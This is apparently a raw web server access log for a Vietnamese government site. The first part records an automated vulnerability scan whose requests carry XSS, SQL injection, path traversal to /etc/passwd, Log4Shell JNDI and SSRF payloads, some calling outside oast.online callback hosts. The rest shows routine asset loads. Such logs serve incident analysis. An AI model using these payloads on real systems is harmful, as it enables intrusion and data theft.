Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205 2023-10-15 18:42:15 103.153.214.94 GET /tiki/tiki-ajax_services.php controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 207 2023-10-15 18:42:16 103.153.214.94 GET /tiki-ajax_services.php controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 18:43:07 103.153.214.94 GET /index.php/Home/uploadify/fileList type=.+&path=../../../ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204 2023-10-15 18:43:49 103.153.214.94 GET /login/forgetpswd.php loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 205 2023-10-15 18:43:59 103.153.214.94 GET /search search_key=%7B%7B1337*1338%7D%7D 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207 2023-10-15 18:44:10 103.153.214.94 GET /ueditor/net/controller.ashx action=catchimage&encode=utf-8 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 202 2023-10-15 18:48:05 103.153.214.94 GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage section=content&tree=undefined&baseUrl=http://ckjv7uic8b6p3donsoogcmxprn9mqyqn5.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 220 2023-10-15 18:48:07 103.153.214.94 GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent section=TryToAvoidGetCacheItem111&baseUrl=http://ckjv7uic8b6p3donsoogig1pbsz1pn6kd.oast.online/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 203 2023-10-15 18:48:09 103.153.214.94 GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss section=AvoidGetCacheItem&baseUrl=http://ckjv7uic8b6p3donsoogkssfds8hzkzgg.oast.online/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 18:48:40 103.153.214.94 GET /v1/submissions - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204 2023-10-15 18:48:56 103.153.214.94 POST /api/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/manage/account/login?redirect=%2Fmanage 404 0 2 214 2023-10-15 18:49:02 103.153.214.94 GET /hoteldruid/inizio.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207 2023-10-15 18:49:05 103.153.214.94 GET /inizio.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 203 2023-10-15 18:50:07 103.153.214.94 GET /<script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 206 2023-10-15 18:51:23 103.153.214.94 POST /search - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 203 2023-10-15 18:52:11 103.153.214.94 GET /dr/authentication/oauth2/oauth2login error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-141%7D$%7B%3A-876%7D.$%7BhostName%7D.uri.ckjv7uic8b6p3donsoogbs5hsjinr5p5i.oast.online%7D 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204 2023-10-15 18:53:24 103.153.214.94 POST /login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn/login.php 405 0 1 203 2023-10-15 18:57:55 103.153.214.94 POST /webapi/auth - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 210 2023-10-15 18:57:57 103.153.214.94 GET /webapi/file/transfer name=/../../../../../../../../etc/passwd&type=db_backup 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203 2023-10-15 18:59:32 103.153.214.94 GET /rest/domains/list sortCol=fullyQualifiedName&sortDir=asc 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205 2023-10-15 19:01:53 103.153.214.94 GET /jpeginfo/jpeginfo.php url=ckjv7uic8b6p3donsoog6tbbwy41mkhh4.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208 2023-10-15 19:02:36 103.153.214.94 GET /mainfile.php username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 204 2023-10-15 19:02:46 103.153.214.94 GET /guest/users/forgotten email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206 2023-10-15 19:03:00 103.153.214.94 GET /down_data.php filename=../../../../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202 2023-10-15 19:03:11 103.153.214.94 GET / - 443 - 45.32.114.243 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.102+Safari/537.36 - 200 0 0 520 2023-10-15 19:06:29 103.153.214.94 GET /api/sms_check.php param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5(999999999)),0x7e),1)--%20 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 2 214 2023-10-15 19:07:42 103.153.214.94 POST /index.php m=member&f=login_save 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 208 2023-10-15 19:08:59 103.153.214.94 POST /zdm/cxf/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 https://bcvt.kontum.gov.vn/zdm/login_xdm_uc.jsp 405 0 1 203 2023-10-15 19:10:34 103.153.214.94 GET /wt3/forceSave.php file=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204 2023-10-15 19:11:40 103.153.214.94 POST /api/user/reg - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 0 2 226 2023-10-15 19:11:42 103.153.214.94 GET /api/group/list - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 0 2 210 2023-10-15 19:12:02 103.153.214.94 GET / PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 204 2023-10-15 19:13:18 103.153.214.94 POST / BazaR&vue=saisir&action=saisir_fiche&id=2 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 227 2023-10-15 19:13:20 103.153.214.94 GET / BazaR&vue=consulter 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 206 2023-10-15 19:17:25 103.153.214.94 GET / PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 211 2023-10-15 19:18:28 103.153.214.94 GET /admin/File/DownloadFile filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 301 0 0 212 2023-10-15 19:18:33 103.153.214.94 GET /admin/cms_channel.php del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(999999999)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 301 0 0 202 2023-10-15 19:18:46 103.153.214.94 GET /service/error/sfdc_preauth.jsp session=s&userid=1&server=http://ckjv7uic8b6p3donsoogjd41nu7dyb74x.oast.online%23.salesforce.com/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 202 2023-10-15 19:20:39 103.153.214.94 POST /zms/admin/index.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/zms/admin/index.php 405 0 1 206 2023-10-15 19:21:36 103.153.214.94 POST /admin/index.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 207 2023-10-15 19:22:21 103.153.214.94 GET / XDEBUG_SESSION_START=2WfF0iiBSPPTbSxCGsiNlIwcm9B 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-15 19:25:55 103.153.214.94 GET /api/users/admin/check - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 0 2 222 2023-10-15 19:27:38 103.153.214.94 GET /do/job.php job=download&url=ZGF0YS9jb25maWcucGg8 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 209 2023-10-15 19:28:36 103.153.214.94 POST /rails/actions error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 209 2023-10-15 19:29:34 103.153.214.94 GET /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206 2023-10-15 19:29:36 103.153.214.94 GET /pma/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 19:29:38 103.153.214.94 GET /pmd/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 19:29:40 103.153.214.94 GET /phpMyAdmin/index.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 200 2023-10-15 19:29:42 103.153.214.94 GET /phpmyadmin/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 202 2023-10-15 19:29:44 103.153.214.94 GET /_phpmyadmin/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201 2023-10-15 19:32:30 103.153.214.94 GET / - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 324 2023-10-15 19:32:31 103.153.214.94 GET /runtime-es5.js - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 320 2023-10-15 19:32:32 103.153.214.94 GET /polyfills-es5.js - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 972 2023-10-15 19:32:33 103.153.214.94 GET /styles-es5.js - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 687 2023-10-15 19:32:55 103.153.214.94 GET /vendor-es5.js - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 21629 2023-10-15 19:32:58 103.153.214.94 GET /main-es5.js - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1618 2023-10-15 19:33:09 103.153.214.94 GET /data-table.eot - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 318 2023-10-15 19:33:09 103.153.214.94 GET /data-table.eot - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 315 2023-10-15 19:33:09 103.153.214.94 GET /data-table.woff - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:33:10 103.153.214.94 GET /data-table.ttf - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:33:10 103.153.214.94 GET /data-table.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 327 2023-10-15 19:33:10 103.153.214.94 GET /~@swimlane/ngx-datatable/index.css - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 321 2023-10-15 19:33:12 103.153.214.94 GET /~@swimlane/ngx-datatable/themes/material.scss - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 393 2023-10-15 19:33:12 103.153.214.94 GET /~@swimlane/ngx-datatable/assets/icons.css - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:33:12 103.153.214.94 GET /ui-icons_222222_256x240.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 327 2023-10-15 19:33:13 103.153.214.94 GET /Avenir_Next_W00_400.eot - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 641 2023-10-15 19:33:13 103.153.214.94 GET /Avenir_Next_W00_400.woff2 - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 316 2023-10-15 19:33:16 103.153.214.94 GET /Avenir_Next_W00_400.woff - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1676 2023-10-15 19:33:18 103.153.214.94 GET /Avenir_Next_W00_400.ttf - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1889 2023-10-15 19:33:20 103.153.214.94 GET /Avenir_Next_W00_400.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1887 2023-10-15 19:33:20 103.153.214.94 GET /Avenir_Next_W00_Italic_400.eot - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 629 2023-10-15 19:33:22 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff2 - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 637 2023-10-15 19:33:24 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 976 2023-10-15 19:33:26 103.153.214.94 GET /Avenir_Next_W00_Italic_400.ttf - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2520 2023-10-15 19:33:34 103.153.214.94 GET /Avenir_Next_W00_Italic_400.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 7562 2023-10-15 19:33:35 103.153.214.94 GET /Avenir_Next_W00_600.eot - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 941 2023-10-15 19:33:37 103.153.214.94 GET /Avenir_Next_W00_600.woff2 - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1255 2023-10-15 19:33:38 103.153.214.94 GET /Avenir_Next_W00_600.woff - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1280 2023-10-15 19:33:42 103.153.214.94 GET /Avenir_Next_W00_600.ttf - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3611 2023-10-15 19:33:46 103.153.214.94 GET /Avenir_Next_W00_600.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 4418 2023-10-15 19:33:48 103.153.214.94 GET /Avenir_Next_W00_Italic_600.eot - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1668 2023-10-15 19:33:51 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff2 - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1336 2023-10-15 19:33:52 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1572 2023-10-15 19:33:56 103.153.214.94 GET /Avenir_Next_W00_Italic_600.ttf - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3178 2023-10-15 19:34:00 103.153.214.94 GET /Avenir_Next_W00_Italic_600.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 4519 2023-10-15 19:34:02 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 941 2023-10-15 19:34:03 103.153.214.94 GET /CalciteWebCoreIcons.woff iz9r4h 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1276 2023-10-15 19:34:06 103.153.214.94 GET /CalciteWebCoreIcons.svg iz9r4h 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2531 2023-10-15 19:34:06 103.153.214.94 GET /basemap-toggle-64.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 317 2023-10-15 19:34:06 103.153.214.94 GET /loading-throb.gif - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:34:07 103.153.214.94 GET /search.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 313 2023-10-15 19:34:07 103.153.214.94 GET /helpIcon.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:34:07 103.153.214.94 GET /manager-manager-module-ngfactory-es5.js - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 